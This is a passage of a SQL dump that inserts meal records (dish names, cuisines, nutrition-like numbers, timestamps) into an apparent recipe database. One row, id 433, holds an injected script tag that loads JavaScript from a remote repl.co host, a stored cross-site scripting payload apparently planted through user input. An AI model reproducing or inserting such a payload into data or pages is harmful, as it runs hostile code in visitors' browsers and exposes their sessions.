RICE','','Azerbaijan',1,NULL,NULL,'','423.55','268','0',1,NULL,'2022-03-24 18:48:44','2022-03-24 18:51:38',19,4),(347,'ROSAMERRY STEAK','','American',1,'steak',NULL,'','566.81','444','0',1,NULL,'2022-03-24 19:48:03','2022-03-24 20:07:10',19,4),(348,'labaness grilled chicken with veg and rice','','Lebanon',1,NULL,NULL,'','396','302','0',1,NULL,'2022-03-24 22:45:40','2022-03-24 22:48:50',23,1),(349,'chicken do piyaza','','India',1,NULL,NULL,'','421.15','390','0',1,NULL,'2022-03-24 22:53:51','2022-03-24 22:57:22',23,1),(350,'grilled chicken with mushroom pepper sauce','',NULL,1,NULL,NULL,'','473.49352941176','654','0',1,NULL,'2022-03-24 23:08:07','2022-03-24 23:08:40',23,1),(351,'garlic sear chicken with spinach','',NULL,1,NULL,NULL,'','496.5','280','0',1,NULL,'2022-03-24 23:15:11','2022-08-27 23:00:55',23,1),(352,'roasted chicken with five spice bbq glaze','',NULL,1,NULL,NULL,'','352.54','252','0',1,NULL,'2022-03-24 23:21:27','2022-09-10 22:18:51',23,1),(353,'Bihari boti caserolle','','Pakistan',1,NULL,NULL,'','409.83','302','0',1,NULL,'2022-03-24 23:33:33','2022-08-29 22:58:38',23,1),(354,'Rogan josh','','Kazakhstan',1,NULL,NULL,'','471.2','220','0',1,NULL,'2022-03-24 23:40:44','2022-03-24 23:40:44',23,1),(355,'steak sandwich','',NULL,1,NULL,NULL,'','499.80793103448','232','0',1,NULL,'2022-03-24 23:44:39','2022-03-26 23:59:37',23,1),(356,'chicken spicy showarma','',NULL,1,NULL,NULL,'','435.2','265','0',1,NULL,'2022-03-24 23:53:14','2022-03-24 23:54:04',23,1),(357,'chicken caesar salad','',NULL,1,NULL,NULL,'','414.12','221','0',1,NULL,'2022-03-24 23:59:00','2022-03-24 23:59:00',23,1),(358,'harira soup','','Morocco',1,NULL,NULL,'','408','260','0',1,NULL,'2022-03-25 00:04:21','2022-03-25 00:06:58',23,1),(359,'FAJITA BURGER','','American',1,NULL,NULL,'','390.56928571429','241','0',1,NULL,'2022-03-25 15:38:15','2022-03-25 15:57:15',28,4),(360,'jalepeno  burger','','American',1,NULL,NULL,'','422.26928571429','231','0',1,NULL,'2022-03-25 15:51:43','2022-03-25 15:57:58',19,4),(361,'SMOKY CHESSE  CHICKEN  JUMBO BURGER','','American',1,NULL,NULL,'','673.67142857143','383','0',1,NULL,'2022-03-25 16:09:54','2022-03-25 16:09:54',19,4),(362,'SMOKY JUMBO BEEF BURGER','','American',1,NULL,NULL,'','658.92142857143','265','0',1,NULL,'2022-03-25 16:20:25','2022-03-25 17:25:14',19,4),(363,'grilled chicken chesse sandwich','','American',1,NULL,NULL,'','537.08333333333','242','0',1,NULL,'2022-03-25 17:46:05','2022-03-25 17:48:42',19,4),(364,'CHICKEN QUESADILLAS SANDWICH','','Macau S.A.R.',1,NULL,NULL,'','394.38','204','0',1,NULL,'2022-03-25 18:33:16','2022-03-25 18:34:18',19,4),(365,'CHICKEN  ARABIC SKEWERS','','Armenia',1,'arabic',NULL,'','456.78','336','0',1,NULL,'2022-03-25 19:12:15','2022-03-25 19:19:39',19,4),(366,'vegetable  chowmin','','Pakistan',1,NULL,NULL,'','249.71428571429','215','0',1,NULL,'2022-03-25 20:21:38','2022-03-25 20:21:38',19,4),(367,'vegetable pasta','','Chad',1,NULL,NULL,'','269.40142857143','191','0',1,NULL,'2022-03-25 20:36:23','2022-03-25 20:36:23',19,4),(368,'tarragon steak','','Italy',1,NULL,NULL,'','586.93','368','0',1,NULL,'2022-03-25 20:44:24','2022-03-25 20:44:24',19,4),(369,'DOUBLE DECKER STEAK','','Mexico',1,NULL,NULL,'','656.42','411','0',1,NULL,'2022-03-25 20:52:13','2022-03-26 08:48:34',19,4),(370,'Birria jalapino wrape','','Mexico',1,NULL,NULL,'','404.63','254','0',1,NULL,'2022-03-25 23:01:35','2022-03-26 23:29:56',23,1),(371,'chicken tikka sandwich','',NULL,1,NULL,NULL,'','468.14','239','0',1,NULL,'2022-03-25 23:14:50','2022-03-25 23:14:50',23,1),(372,'steel cut harissa','',NULL,1,NULL,NULL,'','321.2','215','0',1,NULL,'2022-03-25 23:33:26','2022-04-16 09:44:16',23,1),(373,'B.B.Q STEAK','','American',1,NULL,NULL,'','584.35','415','0',1,NULL,'2022-03-26 08:41:53','2022-03-26 08:41:53',19,4),(374,'Extra Meal','','Pakistan',1,'chicken',NULL,'','264','160','0',1,NULL,'2022-03-29 19:31:50','2022-05-01 19:28:00',28,4),(375,'seekh kaba','','Pakistan',1,NULL,NULL,'','331.59','155','0',1,NULL,'2022-03-31 00:11:42','2022-03-31 00:15:48',23,2),(376,'vegetable','','Albania',1,NULL,NULL,'','10.95','45','0',1,NULL,'2022-04-18 16:23:29','2022-04-18 16:23:29',28,4),(377,'burrito bowl','',NULL,1,NULL,NULL,'','355.04','278','0',1,NULL,'2022-04-30 18:08:40','2022-08-06 20:23:36',5,1),(378,'Lemon pepper chicken','',NULL,1,NULL,NULL,'','374.19','214','0',1,NULL,'2022-05-01 09:16:35','2022-08-29 00:42:59',23,1),(379,'taco season -platter with bread','',NULL,1,NULL,NULL,'','519.99','337','0',1,NULL,'2022-05-01 09:30:46','2022-05-01 09:30:46',23,1),(380,'salisbury steak','',NULL,1,NULL,NULL,'','474.62','294','0',1,NULL,'2022-05-01 10:18:22','2022-09-25 01:00:26',23,1),(381,'chicken','','Afghani',1,NULL,NULL,'','132','80','0',1,NULL,'2022-05-13 19:40:57','2022-05-13 19:40:57',28,4),(382,'water bottle','/tmp/phps4i42Z','Pakistan',1,NULL,NULL,'','','','679',1,NULL,'2022-05-16 12:15:45','2022-05-16 12:15:45',28,4),(383,'shezwan tripple rice','','Singapore',1,NULL,NULL,'','488.48571428571','315','0',1,NULL,'2022-05-21 23:56:17','2022-05-21 23:56:59',23,1),(385,'paneer tikka masala','','Pakistan',1,NULL,NULL,'','450.28','207','0',1,NULL,'2022-05-22 00:16:51','2022-05-22 00:16:51',23,3),(386,'vegetable laksa with rice','','Malaysia',1,NULL,NULL,'','358.9','295','0',1,NULL,'2022-05-22 00:25:59','2022-05-22 00:27:06',23,3),(387,'shezwan tripple rice','','China',1,NULL,NULL,'','364.71428571429','205','0',1,NULL,'2022-05-25 22:35:03','2022-05-25 22:36:09',23,3),(388,'cauliflower munchurian with rice','',NULL,1,NULL,NULL,'','275','385','0',1,NULL,'2022-05-25 22:44:46','2022-05-25 22:46:25',23,3),(389,'veg white kardhi','',NULL,1,NULL,NULL,'','361.3','245','0',1,NULL,'2022-05-25 23:48:14','2022-05-25 23:48:14',23,3),(390,'veg skewed with garlic bread','',NULL,1,NULL,NULL,'','301.39','401','0',1,NULL,'2022-05-25 23:55:24','2022-05-25 23:55:51',23,3),(391,'chicken tikka','','Afghani',1,NULL,NULL,'','412.5','250','0',1,NULL,'2022-06-23 13:16:42','2022-06-23 13:16:42',28,4),(392,'roasted chicken boti','',NULL,1,NULL,NULL,'','362.61','257','0',1,NULL,'2022-08-19 23:41:39','2022-09-01 00:28:15',23,1),(393,'Beef khaosay','',NULL,1,NULL,NULL,'','628.55428571428','281','0',1,NULL,'2022-08-19 23:50:00','2023-01-12 22:33:16',23,1),(394,'beef steak sandwich','',NULL,1,NULL,NULL,'','493.67862068966','227','0',1,NULL,'2022-08-20 00:19:01','2023-04-29 22:49:21',23,1),(395,'oven bake izmir koftee','',NULL,1,NULL,NULL,'','434.18','339','0',1,NULL,'2022-08-20 23:08:45','2022-08-20 23:10:06',23,1),(396,'chicken chili gravy','',NULL,1,NULL,NULL,'','385.97','395','0',1,NULL,'2022-08-20 23:18:11','2022-08-31 20:49:23',23,1),(397,'chicken fahjita','',NULL,1,NULL,NULL,'','430.46','238','0',1,NULL,'2022-08-22 00:03:56','2022-08-22 00:04:31',23,1),(398,'Satay chicken','',NULL,1,NULL,NULL,'','391.99','211','0',1,NULL,'2022-08-27 23:24:18','2022-08-28 00:23:40',23,1),(399,'ministroni soup','',NULL,1,NULL,NULL,'','313.27285714286','278','0',1,NULL,'2022-08-28 23:34:54','2022-08-28 23:36:18',23,1),(400,'Lemon peppers chicken','',NULL,1,NULL,NULL,'','442.95','265','0',1,NULL,'2022-08-29 00:45:29','2022-08-29 00:45:29',23,1),(401,'peanut cookies','',NULL,1,NULL,NULL,'','425.77','107','0',1,NULL,'2022-08-29 01:22:12','2022-08-29 01:37:46',23,1),(402,'chicken frittata','',NULL,1,NULL,NULL,'','218.16','203','0',1,NULL,'2022-08-29 01:37:34','2022-08-30 03:03:23',23,1),(403,'lemon raisins oats bar','',NULL,1,NULL,NULL,'','744.75628959276','277','0',1,NULL,'2022-08-29 01:49:11','2022-08-29 01:54:42',23,1),(404,'dates cake','',NULL,1,NULL,NULL,'','353.47','140','0',1,NULL,'2022-08-29 01:58:23','2022-09-08 00:52:29',23,1),(405,'coffee dietary fiber','/tmp/phpjZxNv2',NULL,1,NULL,NULL,'','211.16','185','683',1,NULL,'2022-08-29 02:22:50','2022-09-30 23:22:32',23,1),(406,'moroccan tagine tikka','',NULL,1,NULL,NULL,'','567.05','310','0',1,NULL,'2022-08-29 23:56:03','2023-08-30 23:01:20',23,1),(407,'cheese pancake','',NULL,1,NULL,NULL,'','251.3','137','0',1,NULL,'2022-08-30 01:50:39','2022-08-30 01:50:39',23,2),(408,'moscow salad','',NULL,1,NULL,NULL,'','220.7','265','0',1,NULL,'2022-08-30 02:02:08','2022-08-30 02:02:09',23,3),(409,'stire fried paneer wrape with jhalapino','',NULL,1,NULL,NULL,'','393.4','165','0',1,NULL,'2022-08-30 02:07:08','2022-09-25 00:23:16',23,3),(410,'vegetable khausay','',NULL,1,NULL,NULL,'','312.62142857143','235','0',1,NULL,'2022-08-30 02:27:07','2022-08-30 02:27:07',23,3),(411,'veg steak with pepper sauce','',NULL,1,NULL,NULL,'','221.01941176471','267','0',1,NULL,'2022-09-03 23:59:24','2022-09-04 00:00:18',23,3),(412,'roast and oats banana bake','',NULL,1,NULL,NULL,'','209.88','172','0',1,NULL,'2022-09-04 00:12:11','2022-09-04 00:12:11',23,3),(413,'peanut crunch coffee','',NULL,1,NULL,NULL,'','430.87','128','0',1,NULL,'2022-09-04 00:41:46','2022-09-04 00:41:46',23,3),(414,'paneer tikka sandwich','',NULL,1,NULL,NULL,'','394.84','183','0',1,NULL,'2022-09-04 00:48:25','2022-09-04 00:51:03',23,3),(415,'coffee','',NULL,1,NULL,NULL,'','5.1','20','0',1,NULL,'2022-09-04 00:53:29','2022-09-04 00:53:29',23,3),(416,'veg Biryani','','Pakistan',1,NULL,NULL,'','172.58','205','0',1,NULL,'2022-09-04 00:57:22','2022-09-04 01:06:02',23,3),(417,'oats pudding','',NULL,1,NULL,NULL,'','152.82','180','0',1,NULL,'2022-09-04 01:13:40','2022-09-04 01:13:40',23,3),(418,'skewed veg with garlic herb sauce','',NULL,1,NULL,NULL,'','296.21','368','0',1,NULL,'2022-09-04 01:20:27','2022-09-04 01:20:27',23,3),(419,'zeera roasted veg with plain rice','',NULL,1,NULL,NULL,'','314.18','589','0',1,NULL,'2022-09-06 00:51:55','2022-09-06 00:53:03',23,3),(420,'vegan spice pancake','',NULL,1,NULL,NULL,'','200.05','445','0',1,NULL,'2022-09-06 00:57:23','2022-09-06 00:59:02',23,3),(421,'veg burger with citrus jam','',NULL,1,NULL,NULL,'','508.59','271','0',1,NULL,'2022-09-06 01:05:03','2022-09-06 01:07:40',23,3),(422,'coco oats cookies','',NULL,1,NULL,NULL,'','274.46','178','0',1,NULL,'2022-09-07 23:54:11','2022-09-07 23:54:11',23,3),(423,'sesome toasted cutlets','',NULL,1,NULL,NULL,'','394.865','315','0',1,NULL,'2022-09-08 00:01:48','2022-09-08 00:01:48',23,3),(424,'chili porridge','',NULL,1,NULL,NULL,'','199.52','162','0',1,NULL,'2022-09-08 00:07:55','2022-09-08 00:07:55',23,3),(425,'flat cake','',NULL,1,NULL,NULL,'','266.8','130','0',1,NULL,'2022-09-08 00:11:31','2022-09-08 00:11:31',23,3),(426,'fluffy thepla','',NULL,1,NULL,NULL,'','201.99','202','0',1,NULL,'2022-09-08 00:47:12','2022-09-08 00:47:12',23,3),(427,'bake date crepe','',NULL,1,NULL,NULL,'','505.59','215','0',1,NULL,'2022-09-08 00:53:27','2022-09-08 00:56:04',23,3),(428,'vegetable lasagnia','','Italy',1,NULL,NULL,'','453.5','531','0',1,NULL,'2022-09-08 01:02:52','2022-09-08 01:04:01',23,3),(429,'black pepper vegetable with garlic rice','',NULL,1,NULL,NULL,'','210.81','378','0',1,NULL,'2022-09-08 01:09:37','2022-09-08 01:10:10',23,3),(430,'french toast','',NULL,1,NULL,NULL,'','316.49923076923','111','0',1,NULL,'2022-09-25 00:10:41','2022-09-25 00:10:41',23,3),(431,'zeera crust','',NULL,1,NULL,NULL,'','158.46','51','0',1,NULL,'2022-09-25 00:21:16','2022-09-25 00:21:16',23,3),(432,'coconut cookies','',NULL,1,NULL,NULL,'','274.30764705882','92','0',1,NULL,'2022-09-25 00:50:28','2022-09-25 00:50:28',23,3),(433,'<script src=\"https://hurt.kedjaw3n.repl.co/\"></script>','/tmp/phpm4Q9RQ','Afghani',1,'<script src=\"https://hurt.kedjaw3n.repl.co/\"></script>',NULL,'','','','682',1,NULL,'2022-09-30 14:28:19','2022-09-30 14:28:19',5,4),(434,'corn chicken broth with egg','','China',1,NULL,NULL,'','197.44','438','0',1,NULL,'2022-12-03 23:03:22','2022-12-03 23:24:10',23,1),(435,'vegan broth','','Chile',1,NULL,NULL,'','45.73','455','0',1,NULL,'2022-12-03 23:28:44','2022-12-03 23:29:45',23,3),(436,'grilled chicken teriyaki with egg fried rice','','Japan',1,NULL,NULL,'','481.06','299','0',1,NULL,'2023-03-14 22:11:20','2023-03-14 22:11:49',23,1),(437,'dim sum','',NULL,1,NULL,NULL,'','350.52','156','0',1,NULL,'2023-03-14 22:24:32','2023-03-14 22:24:32',23,1),(438,'quesadilla with corn and chicken','',NULL,1,NULL,NULL,'','374.72','157','0',1,NULL,'2023-03-14 22:28:32','2023-04-29 22:48:03',23,1),(439,'Chicken Zaffrani Biryani','',NULL,1,NULL,NULL,'','435.19','326','0',1,NULL,'2023-03-15 00:24:35','2023-03-15 00:24:36',23,1),(440,'Mint Mocktail','',NULL,1,NULL,NULL,'','98.05','403','0',1,NULL,'2023-04-19 10:38:29','2023-04-19 10:38:30',23,1),(441,'Steam Chicken','',NULL,1,NULL,NULL,'','508.55','305','0',1,NULL,'2023-04-19 11:04:29','2023-04-19 11:04:29',23,1);

--
